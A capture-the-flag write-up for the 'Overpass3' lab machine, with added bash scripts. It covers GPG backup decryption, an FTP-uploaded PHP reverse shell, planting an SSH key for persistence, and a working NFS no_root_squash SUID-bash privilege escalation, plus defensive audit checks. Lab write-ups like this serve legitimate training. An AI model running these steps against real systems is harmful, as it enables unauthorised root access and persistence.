Overpass3 Writeup

Overpass3 link
Enumeration


First, let's run an nmap scan to take a look at what services are exposed.



Three ports are exposed: 21 (FTP), 22 (SSH) and 80 (HTTP).

First, let's take a look at what's being hosted on the web server on port 80.

Pretty basic webpage, nothing of interest here. A quick look through the page source doesn't turn up anything hidden either, just a comment about the uptime, which isn't useful.

Moving on, let's use gobuster to see if there are any hidden directories or files.

Interesting, there appears to be a directory called /backups/. Let's take a look at what's there.

Looks like there's a file with something backed up inside. Let's download the file and unzip it.

The archive holds an Excel spreadsheet (.xlsx) that has been encrypted with GPG, and, luckily for us, the private key was backed up right next to it. Importing that key lets us decrypt the file and take a look at what's inside the spreadsheet. (Backing up a private key alongside the data it protects defeats the point of encrypting that data in the first place.)
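As an added example (not part of the original writeup, and not the room's real backup), here is the import-and-decrypt step as a script. It builds a constructed "backup" in a scratch directory, a key pair, an xlsx stand-in encrypted to it and the exported private key, then recovers the plaintext from a fresh keyring exactly the way you would with the files pulled from /backups/. The file names and the user ID on the key are assumptions.

```bash
#!/bin/bash
# Added example, not from the original writeup: decrypt a GPG-encrypted
# file when the backup shipped the private key next to it. Everything
# here is constructed in temporary directories so it runs offline.

# import_and_decrypt KEYFILE CIPHERTEXT OUTFILE
# Imports the found private key into a throwaway keyring, then decrypts.
import_and_decrypt() {
    local key="$1" ct="$2" out="$3"
    GNUPGHOME="$(mktemp -d)"; export GNUPGHOME
    chmod 700 "$GNUPGHOME"
    gpg --batch --quiet --import "$key"
    # loopback pinentry with an empty passphrase: the found key was not
    # passphrase-protected. A protected key would fail here and need the
    # passphrase supplied instead.
    gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
        --output "$out" --decrypt "$ct"
}

# make_fake_backup DIR
# Constructs the three artifacts the real backup contained: an encrypted
# spreadsheet stand-in and the (unprotected) private key that opens it.
# The user ID and file names are assumptions.
make_fake_backup() {
    local dir="$1"
    GNUPGHOME="$dir/keyring"; export GNUPGHOME
    mkdir -p "$GNUPGHOME"; chmod 700 "$GNUPGHOME"
    gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
        --quick-gen-key 'backup <backup@example.invalid>' default default never
    printf 'constructed spreadsheet contents\n' > "$dir/plain.xlsx"
    gpg --batch --quiet --trust-model always \
        --recipient 'backup@example.invalid' \
        --output "$dir/plain.xlsx.gpg" --encrypt "$dir/plain.xlsx"
    gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
        --armor --export-secret-keys > "$dir/priv.key"
    rm "$dir/plain.xlsx"
}

# demo -> "ok" when the round trip recovers the plaintext,
#         "skipped" when this box has no gpg that supports the calls,
#         "failed" otherwise.
demo() {
    command -v gpg >/dev/null 2>&1 || { echo skipped; return 0; }
    local work
    work="$(mktemp -d)"
    make_fake_backup "$work" >/dev/null 2>&1 || { echo skipped; return 0; }
    import_and_decrypt "$work/priv.key" "$work/plain.xlsx.gpg" \
        "$work/recovered.xlsx" >/dev/null 2>&1 || { echo failed; return 0; }
    if [ "$(cat "$work/recovered.xlsx")" = "constructed spreadsheet contents" ]; then
        echo ok
    else
        echo failed
    fi
}

demo
```

Against the real backup only the import_and_decrypt half is needed: `import_and_decrypt priv.key file.xlsx.gpg file.xlsx`, substituting whatever the key and spreadsheet were actually called in the archive.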

Looks like we have some credentials. Let's try them against the FTP server to see if we can get in.

Success! The first set of credentials gave us access to the FTP server. Let's take a look at what goodies we have.

Interesting, it looks like we have access to the web server's files, which is most likely our initial access point. But first, a quick test to make sure none of the credentials we discovered get us in over SSH.

And nope, I won't even bother showing it, but SSH doesn't work with any of them. Worth noting, though, that the paradox user gets a different response from SSH than the other two users, who both come back with "incorrect password". A response difference like that singles paradox out from the other two accounts, which is useful to remember.

Back to FTP it is then. Seeing as we can write to the web server's directory, we should be able to upload a reverse shell. Let's give it a shot.

Initial Access

Now let's open up a netcat listener and trigger the reverse shell by browsing to /reverse.php.

A note about the above: I prefix my netcat listener with rlwrap, which wraps the raw shell in readline and gives it line editing and command history. The shell still needs to be upgraded to a proper tty afterwards. You don't have to use rlwrap, it's just a preference of mine.

Now we have a much more stable socat shell. The first thing we can do is switch over to the paradox user using su.

The first thing I always do is a quick sudo -l, which in this case, after entering the password, returns a message saying we can't run sudo on this machine. Next I always get linpeas onto the box and let it do a quick enumeration pass for me.

A quick look through brings up some interesting stuff, but no web flag, so let's use find to see if we can locate any flags at all.

Sure enough, our flag is located at /usr/share/httpd/web.flag, and a quick cat on the file gives us the first flag. Now back to the good stuff.

Looks like we have an NFS share, although nmap didn't show one being exposed. Let's take a quick look at what linpeas reported as listening on the box.

Port 2049 is the default NFS port and it's running, but it's bound to localhost only, which explains why nmap didn't show it. A quick attempt at using socat to forward the local port didn't work; we ended up with a filtered port and couldn't reach the share. So let's set up SSH access and use that to port forward instead.
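As an added example (my own, not something from the original writeup), the two checks worth running on the box before going to the trouble of a port forward: which listeners are bound to loopback only, which is why nmap never saw 2049, and whether /etc/exports carries no_root_squash, the option the privilege escalation later in the room depends on. Both inputs below are constructed samples in the shape of `ss -tlnH` output and an /etc/exports file, not the target's real ones; on the box you would feed in the real command output and file instead.

```bash
#!/bin/bash
# Added example, not from the original writeup: audit NFS exposure from
# the inside of a box. Inputs are constructed samples so it runs offline.

# Constructed sample of `ss -tlnH` output (columns: State Recv-Q Send-Q
# Local-Address:Port Peer-Address:Port). Not the target's real output.
SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
LISTEN 0 64 127.0.0.1:2049 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*'

# Constructed sample /etc/exports. Not the target's real file.
SAMPLE_EXPORTS='# /etc/exports
/home/james *(rw,sync,no_root_squash,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync,root_squash)
/data/backup 192.168.1.5(rw,no_subtree_check)'

# listener_scope SS_TEXT -> one "<port> local|all" line per listener.
# "local" means bound to a loopback address: reachable from the box, but
# not from outside without a forward.
listener_scope() {
    printf '%s\n' "$1" | awk '
        $1 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)
            host = $4; sub(/:[^:]*$/, "", host)
            if (host == "127.0.0.1" || host == "[::1]")
                print port, "local"
            else
                print port, "all"
        }'
}

# risky_exports EXPORTS_TEXT -> "<path> <client> <reasons>" for each
# client entry that disables root squashing (a root user on any allowed
# client can then write root-owned, setuid files into the export) or
# grants rw to every host.
risky_exports() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; sub(/\(.*/, "", client)
                opts = $i; sub(/^[^(]*\(/, "", opts); sub(/\).*/, "", opts)
                reason = ""
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    reason = "no_root_squash"
                if (client == "*" && opts ~ /(^|,)rw(,|$)/)
                    reason = reason (reason == "" ? "" : ",") "rw_to_world"
                if (reason != "")
                    print path, client, reason
            }
        }'
}

# Stand-alone run over the constructed samples
listener_scope "$SAMPLE_SS"
risky_exports "$SAMPLE_EXPORTS"
```

On the target the same functions take `listener_scope "$(ss -tlnH)"` and `risky_exports "$(cat /etc/exports)"`; a "2049 local" line plus a no_root_squash hit is exactly the situation the rest of this writeup exploits.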

First, run ssh-keygen -f paradox on our machine to generate a key pair. Then cat the paradox.pub file, copy what's printed in the terminal, and in the remote session as paradox run echo "[paradox.pub contents]" >> /home/paradox/.ssh/authorized_keys. The .ssh directory needs to be mode 700 and authorized_keys mode 600, otherwise sshd ignores the key.

PrivEsc


Now we can create an SSH local port forward so that the NFS share is exposed on our machine. We could also switch to SSH for the paradox session, but there isn't much point, as we will hopefully be moving on to the james account.

We can now make a new directory to mount on, mount james' home directory, and hopefully find our user flag.
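The key install, the forward and the mount as one script, added here as an example rather than taken from the original writeup. The runnable part installs a public key into a user's authorized_keys with the modes sshd's StrictModes requires (a pasted key silently failing because .ssh is group-writable is a common time sink) and refuses to append the same key twice; the forward and mount functions carry the real ssh and mount commands but only run when DO_CONNECT=1 is set, since there is no target to reach offline. The target address, the key file name and the mount point are assumptions, and the public key used in the demo is a constructed placeholder, not a real key.

```bash
#!/bin/bash
# Added example, not from the original writeup: SSH key install, local
# port forward of the loopback-only NFS port, and the mount.

TARGET="${TARGET:-10.10.10.10}"     # hypothetical target address
KEYFILE="${KEYFILE:-paradox}"       # matches `ssh-keygen -f paradox`
MOUNTPOINT="${MOUNTPOINT:-./james}" # local mount point (assumed name)

# make_key: generate the key pair, no passphrase (-N '') so the forward
# can run unattended. Not run by default.
make_key() {
    ssh-keygen -t ed25519 -N '' -f "$KEYFILE"
}

# install_pubkey HOME_DIR PUBKEY_LINE
# Appends the key once and sets the modes sshd accepts under StrictModes.
install_pubkey() {
    local home="$1" pub="$2"
    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    if ! grep -qxF "$pub" "$home/.ssh/authorized_keys"; then
        printf '%s\n' "$pub" >> "$home/.ssh/authorized_keys"
    fi
    chmod 600 "$home/.ssh/authorized_keys"
}

# count_keys HOME_DIR -> number of key lines in authorized_keys
count_keys() {
    grep -c '^ssh-' "$1/.ssh/authorized_keys" || true
}

# perms_ok HOME_DIR -> 0 if the modes are what StrictModes accepts
perms_ok() {
    [ "$(stat -c '%a' "$1/.ssh")" = "700" ] &&
    [ "$(stat -c '%a' "$1/.ssh/authorized_keys")" = "600" ]
}

# forward_nfs: local 2049 -> 127.0.0.1:2049 on the target. NFSv4 needs
# only 2049; an NFSv3 export would also need rpcbind and mountd forwarded.
forward_nfs() {
    ssh -i "$KEYFILE" -N -f -L 2049:127.0.0.1:2049 "paradox@$TARGET"
}

# mount_james: mount the export through the forward (run as root locally).
mount_james() {
    mkdir -p "$MOUNTPOINT"
    mount -t nfs -o port=2049,nfsvers=4 "127.0.0.1:/home/james" "$MOUNTPOINT"
}

# Stand-alone demo against a scratch home directory with a constructed
# (not real) public key line.
CONSTRUCTED_PUB='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedPlaceholderKeyNotARealKey0 attacker@kali'
demo_home="$(mktemp -d)"
install_pubkey "$demo_home" "$CONSTRUCTED_PUB"
install_pubkey "$demo_home" "$CONSTRUCTED_PUB"   # second call must not duplicate
echo "keys installed: $(count_keys "$demo_home")"
perms_ok "$demo_home" && echo "permissions: ok"

# Network steps only on request: DO_CONNECT=1 ./script.sh
if [ "${DO_CONNECT:-0}" = "1" ]; then
    forward_nfs && mount_james
fi
```

Against the real box you would run install_pubkey with /home/paradox and the contents of paradox.pub from the remote paradox session, then the forward and the mount from your own machine.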

And sure enough we have our user flag. A cat on the file gives us the second flag to enter.
Now that we have james' home directory, and it is exported with no_root_squash, getting root on the machine is very easy: with root squashing disabled, root on the NFS client (our machine) is treated as root on the share, so we can write root-owned files straight onto the target's disk. First we need to check the .ssh folder and see if there's a private key in it.

And sure enough there is one. Since the share is mounted on our machine, we can use the key directly without having to download it.

First we want to copy the target's own /bin/bash into james' home directory. We use the copy that's already on the machine because a bash binary from our attacking machine is likely linked against a newer GLIBC and would fail with version errors when we try to run it on the target.



Next, back on our machine as root, copy the bash binary to a new file so that it is owned by root, and add the SUID bit to it. Because the export has no_root_squash, the server writes the root-owned file onto the target's disk exactly as we created it.

Finally, head back to our SSH session as james and run the newly created bash binary with -p, which keeps the effective uid the SUID bit gave us instead of dropping back to james. That's root, and the root flag.
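The no_root_squash escalation above as a script, added here as an example and not taken from the original writeup, with each step labelled by the side it runs on. It also includes the check that either side wants: the attacker, to confirm the setuid bit and root ownership survived the copy before trying it, and a defender, to scan anything exported with no_root_squash for planted setuid binaries. The share path and binary name are assumptions; the stand-alone run uses a scratch directory and a copy of the local shell in place of a real NFS mount, and only performs the chown when it happens to be running as root.

```bash
#!/bin/bash
# Added example, not from the original writeup: SUID bash via an NFS
# export with no_root_squash, plus the check that finds the result.

SHARE="${SHARE:-./james}"        # where the forwarded export is mounted (assumed)
NAME="${NAME:-bash}"             # name of the staged copy (assumed)
BASH_SRC="${BASH_SRC:-/bin/bash}"  # the TARGET's bash when run on the target

# Target side, as james, inside the share: stage the target's own bash.
# A bash from the attacking box may need newer GLIBC symbol versions than
# the target's libc provides and would refuse to start.
stage_bash() {
    cp "$BASH_SRC" "$SHARE/$NAME"
}

# Attacker side, as root: with no_root_squash the server honours uid 0, so
# the root-owned setuid copy lands on the target's filesystem as-is.
# 4755 = setuid bit + rwxr-xr-x.
make_suid_root() {
    local src="$SHARE/$NAME" dst="$SHARE/$NAME.suid"
    cp "$src" "$dst"
    chown root:root "$dst"
    chmod 4755 "$dst"
}

# is_suid_root FILE -> 0 if owned by uid 0 and the setuid bit is set
is_suid_root() {
    [ "$(stat -c '%u' "$1")" = "0" ] && [ -u "$1" ]
}

# find_suid DIR -> "<owner> <mode> <path>" for every setuid file under DIR.
# Run against an export with no_root_squash, a root-owned hit you did not
# put there is this attack seen from the server's side.
find_suid() {
    find "$1" -type f -perm -4000 -printf '%u %m %p\n' 2>/dev/null | sort
}

# Target side again, as james: -p keeps the effective uid the setuid bit
# gave the process; without it bash drops back to the real uid.
root_shell() {
    "$SHARE/$NAME.suid" -p
}

# Stand-alone demo in a scratch directory (no NFS, no target).
SHARE="$(mktemp -d)"
BASH_SRC="$(command -v bash || command -v sh)"
stage_bash
if [ "$(id -u)" = "0" ]; then
    make_suid_root
else
    # unprivileged: we can set the bit on our own copy but cannot chown it
    # to root, which is exactly why the real attack needs no_root_squash
    cp "$SHARE/$NAME" "$SHARE/$NAME.suid" && chmod 4755 "$SHARE/$NAME.suid"
fi
find_suid "$SHARE"
is_suid_root "$SHARE/$NAME.suid" && echo "root-owned setuid binary staged"
```

For the real run the sequence is stage_bash from the james SSH session, make_suid_root on the attacking machine with SHARE pointing at the mount, and root_shell back in the james session. Note that find_suid on a share mounted with nosuid still lists the file; the bit is stored on disk, it's the mount option on the target that decides whether exec honours it.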


